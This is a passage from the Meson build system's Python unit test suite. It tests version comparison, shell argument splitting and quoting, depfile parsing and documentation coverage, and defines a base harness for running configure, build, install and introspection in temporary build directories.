("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# linue continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
md = None
with open('docs/markdown/Builtin-options.md') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = list(re.finditer(r"^## (.+)$", md, re.MULTILINE)) + [None]
for s1, s2 in zip(sections[:], sections[1:]):
if s1.group(1) == "Universal options":
# Extract the content for this section
end = s2.start() if s2 is not None else len(md)
content = md[s1.end():end]
subsections = list(re.finditer(r"^### (.+)$", content, re.MULTILINE)) + [None]
for sub1, sub2 in zip(subsections[:], subsections[1:]):
if sub1.group(1) == "Directories" or sub1.group(1) == "Core options":
# Extract the content for this subsection
sub_end = sub2.start() if sub2 is not None else len(content)
subcontent = content[sub1.end():sub_end]
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) .* \|", subcontent, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(len(found_entries & arches), 0)
found_entries |= arches
break
self.assertEqual(found_entries, set([
*mesonbuild.coredata.builtin_options.keys(),
*mesonbuild.coredata.builtin_options_per_machine.keys()
]))
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md") as f:
md = f.read()
self.assertIsNotNone(md)
sections = list(re.finditer(r"^## (.+)$", md, re.MULTILINE))
for s1, s2 in zip(sections[::2], sections[1::2]):
if s1.group(1) == "CPU families":
# Extract the content for this section
content = md[s1.end():s2.start()]
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown files in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt") as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that the all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
class BasePlatformTests(unittest.TestCase):
def setUp(self):
super().setUp()
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
self.prefix = '/usr'
self.libdir = 'lib'
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
self.build_command, self.clean_command, self.test_command, self.install_command, \
self.uninstall_command = get_backend_commands(self.backend)
# Test directories
self.common_test_dir = os.path.join(src_root, 'test cases/common')
self.vala_test_dir = os.path.join(src_root, 'test cases/vala')
self.framework_test_dir = os.path.join(src_root, 'test cases/frameworks')
self.unit_test_dir = os.path.join(src_root, 'test cases/unit')
self.rewrite_test_dir = os.path.join(src_root, 'test cases/rewrite')
# Misc stuff
self.orig_env = os.environ.copy()
if self.backend is Backend.ninja:
self.no_rebuild_stdout = ['ninja: no work to do.', 'samu: nothing to do']
else:
# VS doesn't have a stable output when no changes are done
# XCode backend is untested with unit tests, help welcome!
self.no_rebuild_stdout = ['UNKNOWN BACKEND {!r}'.format(self.backend.name)]
self.builddirs = []
self.new_builddir()
def change_builddir(self, newdir):
self.builddir = newdir
self.privatedir = os.path.join(self.builddir, 'meson-private')
self.logdir = os.path.join(self.builddir, 'meson-logs')
self.installdir = os.path.join(self.builddir, 'install')
self.distdir = os.path.join(self.builddir, 'meson-dist')
self.mtest_command = self.meson_command + ['test', '-C', self.builddir]
self.builddirs.append(self.builddir)
def new_builddir(self):
if not is_cygwin():
# Keep builddirs inside the source tree so that virus scanners
# don't complain
newdir = tempfile.mkdtemp(dir=os.getcwd())
else:
# But not on Cygwin because that breaks the umask tests. See:
# https://github.com/mesonbuild/meson/pull/5546#issuecomment-509666523
newdir = tempfile.mkdtemp()
# In case the directory is inside a symlinked directory, find the real
# path otherwise we might not find the srcdir from inside the builddir.
newdir = os.path.realpath(newdir)
self.change_builddir(newdir)
def _print_meson_log(self):
log = os.path.join(self.logdir, 'meson-log.txt')
if not os.path.isfile(log):
print("{!r} doesn't exist".format(log))
return
with open(log, 'r', encoding='utf-8') as f:
print(f.read())
def tearDown(self):
for path in self.builddirs:
try:
windows_proof_rmtree(path)
except FileNotFoundError:
pass
os.environ.clear()
os.environ.update(self.orig_env)
super().tearDown()
def _run(self, command, *, workdir=None, override_envvars=None):
'''
Run a command while printing the stdout and stderr to stdout,
and also return a copy of it
'''
# If this call hangs CI will just abort. It is very hard to distinguish
# between CI issue and test bug in that case. Set timeout and fail loud
# instead.
if override_envvars is None:
env = None
else:
env = os.environ.copy()
env.update(override_envvars)
p = subprocess.run(command, stdout=subprocess.PIPE,
stderr=subprocess.STDOUT, env=env,
universal_newlines=True, cwd=workdir, timeout=60 * 5)
print(p.stdout)
if p.returncode != 0:
if 'MESON_SKIP_TEST' in p.stdout:
raise unittest.SkipTest('Project requested skipping.')
raise subprocess.CalledProcessError(p.returncode, command, output=p.stdout)
return p.stdout
def init(self, srcdir, *,
extra_args=None,
default_args=True,
inprocess=False,
override_envvars=None):
self.assertPathExists(srcdir)
if extra_args is None:
extra_args = []
if not isinstance(extra_args, list):
extra_args = [extra_args]
args = [srcdir, self.builddir]
if default_args:
args += ['--prefix', self.prefix,
'--libdir', self.libdir]
if self.meson_cross_file:
args += ['--cross-file', self.meson_cross_file]
self.privatedir = os.path.join(self.builddir, 'meson-private')
if inprocess:
try:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
(returncode, out, err) = run_configure_inprocess(self.meson_args + args + extra_args)
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
if 'MESON_SKIP_TEST' in out:
raise unittest.SkipTest('Project requested skipping.')
if returncode != 0:
self._print_meson_log()
print('Stdout:\n')
print(out)
print('Stderr:\n')
print(err)
raise RuntimeError('Configure failed')
except Exception:
self._print_meson_log()
raise
finally:
# Close log file to satisfy Windows file locking
mesonbuild.mlog.shutdown()
mesonbuild.mlog.log_dir = None
mesonbuild.mlog.log_file = None
else:
try:
out = self._run(self.setup_command + args + extra_args, override_envvars=override_envvars)
except unittest.SkipTest:
raise unittest.SkipTest('Project requested skipping: ' + srcdir)
except Exception:
self._print_meson_log()
raise
return out
def build(self, target=None, *, extra_args=None, override_envvars=None):
if extra_args is None:
extra_args = []
# Add arguments for building the target (if specified),
# and using the build dir (if required, with VS)
args = get_builddir_target_args(self.backend, self.builddir, target)
return self._run(self.build_command + args + extra_args, workdir=self.builddir, override_envvars=override_envvars)
def clean(self, *, override_envvars=None):
dir_args = get_builddir_target_args(self.backend, self.builddir, None)
self._run(self.clean_command + dir_args, workdir=self.builddir, override_envvars=override_envvars)
def run_tests(self, *, inprocess=False, override_envvars=None):
if not inprocess:
self._run(self.test_command, workdir=self.builddir, override_envvars=override_envvars)
else:
if override_envvars is not None:
old_envvars = os.environ.copy()
os.environ.update(override_envvars)
try:
run_mtest_inprocess(['-C', self.builddir])
finally:
if override_envvars is not None:
os.environ.clear()
os.environ.update(old_envvars)
def install(self, *, use_destdir=True, override_envvars=None):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('{!r} backend can\'t install files'.format(self.backend.name))
if use_destdir:
destdir = {'DESTDIR': self.installdir}
if override_envvars is None:
override_envvars = destdir
else:
override_envvars.update(destdir)
self._run(self.install_command, workdir=self.builddir, override_envvars=override_envvars)
def uninstall(self, *, override_envvars=None):
self._run(self.uninstall_command, workdir=self.builddir, override_envvars=override_envvars)
def run_target(self, target, *, override_envvars=None):
'''
Run a Ninja target while printing the stdout and stderr to stdout,
and also return a copy of it
'''
return self.build(target=target, override_envvars=override_envvars)
def setconf(self, arg, will_build=True):
if not isinstance(arg, list):
arg = [arg]
if will_build:
ensure_backend_detects_changes(self.backend)
self._run(self.mconf_command + arg + [self.builddir])
def wipe(self):
windows_proof_rmtree(self.builddir)
def utime(self, f):
ensure_backend_detects_changes(self.backend)
os.utime(f)
def get_compdb(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Compiler db not available with {} backend'.format(self.backend.name))
try:
with open(os.path.join(self.builddir, 'compile_commands.json')) as ifile:
contents = json.load(ifile)
except FileNotFoundError:
raise unittest.SkipTest('Compiler db not found')
# If Ninja is using .rsp files, generate them, read their contents, and
# replace it as the command for all compile commands in the parsed json.
if len(contents) > 0 and contents[0]['command'].endswith('.rsp'):
# Pretend to build so that the rsp files are generated
self.build(extra_args=['-d', 'keeprsp', '-n'])
for each in contents:
# Extract the actual command from the rsp file
compiler, rsp = each['command'].split(' @')
rsp = os.path.join(self.builddir, rsp)
# Replace the command with its contents
with open(rsp, 'r', encoding='utf-8') as f:
each['command'] = compiler + ' ' + f.read()
return contents
def get_meson_log(self):
with open(os.path.join(self.builddir, 'meson-logs', 'meson-log.txt')) as f:
return f.readlines()
def get_meson_log_compiler_checks(self):
'''
Fetch a list command-lines run by meson for compiler checks.
Each command-line is returned as a list of arguments.
'''
log = self.get_meson_log()
prefix = 'Command line:'
cmds = [l[len(prefix):].split() for l in log if l.startswith(prefix)]
return cmds
def introspect(self, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [self.builddir],
universal_newlines=True)
return json.loads(out)
def introspect_directory(self, directory, args):
if isinstance(args, str):
args = [args]
out = subprocess.check_output(self.mintro_command + args + [directory],
universal_newlines=True)
try:
obj = json.loads(out)
except Exception as e:
print(out)
raise e
return obj
def assertPathEqual(self, path1, path2):
'''
Handles a lot of platform-specific quirks related to paths such as
separator, case-sensitivity, etc.
'''
self.assertEqual(PurePath(path1), PurePath(path2))
def assertPathListEqual(self, pathlist1, pathlist2):
self.assertEqual(len(pathlist1), len(pathlist2))
worklist = list(zip(pathlist1, pathlist2))
for i in worklist:
if i[0] is None:
self.assertEqual(i[0], i[1])
else:
self.assertPathEqual(i[0], i[1])
def assertPathBasenameEqual(self, path, basename):
msg = '{!r} does not end with {!r}'.format(path, basename)
# We cannot use os.path.basename because it returns '' when the path
# ends with '/' for some silly reason. This is not how the UNIX utility
# `basename` works.
path_basename = PurePath(path).parts[-1]
self.assertEqual(PurePath(path_basename), PurePath(basename), msg)
def assertBuildIsNoop(self):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn(ret.split('\n')[-2], self.no_rebuild_stdout)
elif self.backend is Backend.vs:
# Ensure that some target said that no rebuild was done
self.assertIn('CustomBuild:\n All outputs are up-to-date.', ret)
self.assertIn('ClCompile:\n All outputs are up-to-date.', ret)
self.assertIn('Link:\n All outputs are up-to-date.', ret)
# Ensure that no targets were built
clre = re.compile('ClCompile:\n [^\n]*cl', flags=re.IGNORECASE)
linkre = re.compile('Link:\n [^\n]*link', flags=re.IGNORECASE)
self.assertNotRegex(ret, clre)
self.assertNotRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertRebuiltTarget(self, target):
ret = self.build()
if self.backend is Backend.ninja:
self.assertIn('Linking target {}'.format(target), ret)
elif self.backend is Backend.vs:
# Ensure that this target was rebuilt
linkre = re.compile('Link:\n [^\n]*link[^\n]*' + target, flags=re.IGNORECASE)
self.assertRegex(ret, linkre)
elif self.backend is Backend.xcode:
raise unittest.SkipTest('Please help us fix this test on the xcode backend')
else:
raise RuntimeError('Invalid backend: {!r}'.format(self.backend.name))
def assertPathExists(self, path):
m = 'Path {!r} should exist'.format(path)
self.assertTrue(os.path.exists(path), msg=m)
def assertPathDoesNotExist(self, path):
m = 'Path {!r} should not exist'.format(path)
self.assertFalse(os.path.exists(path), msg=m)
class AllPlatformTests(BasePlatformTests):
'''
Tests that should run on all platforms
'''
def test_default_options_prefix(self):
'''
Tests that setting a prefix in default_options in project() works.
Can't be an ordinary test because we pass --prefix to meson there.
https://github.com/mesonbuild/meson/issues/1349
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
self.init(testdir, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
prefix = opt['value']
self.assertEqual(prefix, '/absoluteprefix')
def test_do_conf_file_preserve_newlines(self):
def conf_file(in_data, confdata):
with temp_filename() as fin:
with open(fin, 'wb') as fobj:
fobj.write(in_data.encode('utf-8'))
with temp_filename() as fout:
mesonbuild.mesonlib.do_conf_file(fin, fout, confdata, 'meson')
with open(fout, 'rb') as fobj:
return fobj.read().decode('utf-8')
confdata = {'VAR': ('foo', 'bar')}
self.assertEqual(conf_file('@VAR@\n@VAR@\n', confdata), 'foo\nfoo\n')
self.assertEqual(conf_file('@VAR@\r\n@VAR@\r\n', confdata), 'foo\r\nfoo\r\n')
def test_absolute_prefix_libdir(self):
'''
Tests that setting absolute paths for --prefix and --libdir work. Can't
be an ordinary test because these are set via the command-line.
https://github.com/mesonbuild/meson/issues/1341
https://github.com/mesonbuild/meson/issues/1345
'''
testdir = os.path.join(self.common_test_dir, '90 default options')
prefix = '/someabs'
libdir = 'libdir'
extra_args = ['--prefix=' + prefix,
# This can just be a relative path, but we want to test
# that passing this as an absolute path also works
'--libdir=' + prefix + '/' + libdir]
self.init(testdir, extra_args=extra_args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
if opt['name'] == 'prefix':
self.assertEqual(prefix, opt['value'])
elif opt['name'] == 'libdir':
self.assertEqual(libdir, opt['value'])
def test_libdir_must_be_inside_prefix(self):
'''
Tests that libdir is forced to be inside prefix no matter how it is set.
Must be a unit test for obvious reasons.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
# libdir being inside prefix is ok
args = ['--prefix', '/opt', '--libdir', '/opt/lib32']
self.init(testdir, extra_args=args)
self.wipe()
# libdir not being inside prefix is not ok
args = ['--prefix', '/usr', '--libdir', '/opt/lib32']
self.assertRaises(subprocess.CalledProcessError, self.init, testdir, extra_args=args)
self.wipe()
# libdir must be inside prefix even when set via mesonconf
self.init(testdir)
self.assertRaises(subprocess.CalledProcessError, self.setconf, '-Dlibdir=/opt', False)
def test_prefix_dependent_defaults(self):
'''
Tests that configured directory paths are set to prefix dependent
defaults.
'''
testdir = os.path.join(self.common_test_dir, '1 trivial')
expected = {
'/opt': {'prefix': '/opt',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': 'var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': 'com',
'sysconfdir': 'etc'},
'/usr': {'prefix': '/usr',
'bindir': 'bin', 'datadir': 'share', 'includedir': 'include',
'infodir': 'share/info',
'libexecdir': 'libexec', 'localedir': 'share/locale',
'localstatedir': '/var', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/lib',
'sysconfdir': '/etc'},
'/usr/local': {'prefix': '/usr/local',
'bindir': 'bin', 'datadir': 'share',
'includedir': 'include', 'infodir': 'share/info',
'libexecdir': 'libexec',
'localedir': 'share/locale',
'localstatedir': '/var/local', 'mandir': 'share/man',
'sbindir': 'sbin', 'sharedstatedir': '/var/local/lib',
'sysconfdir': 'etc'},
# N.B. We don't check 'libdir' as it's platform dependent, see
# default_libdir():
}
for prefix in expected:
args = ['--prefix', prefix]
self.init(testdir, extra_args=args, default_args=False)
opts = self.introspect('--buildoptions')
for opt in opts:
name = opt['name']
value = opt['value']
if name in expected[prefix]:
self.assertEqual(value, expected[prefix][name])
self.wipe()
def test_default_options_prefix_dependent_defaults(self):
'''
Tests that setting a prefix in default_options in project() sets prefix
dependent defaults for other options, and that those defaults can
be overridden in default_options or by the command line.
'''
testdir = os.path.join(self.common_test_dir, '168 default options prefix dependent defaults')
expected = {
'':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--prefix=/usr':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/sharedstate'},
'--sharedstatedir=/var/state':
{'prefix': '/usr',
'sysconfdir': '/etc',
'localstatedir': '/var',
'sharedstatedir': '/var/state'},
'--sharedstatedir=/var/state --prefix=/usr --sysconfdir=sysconf':
{'prefix': '/usr',
'sysconfdir': 'sysconf',
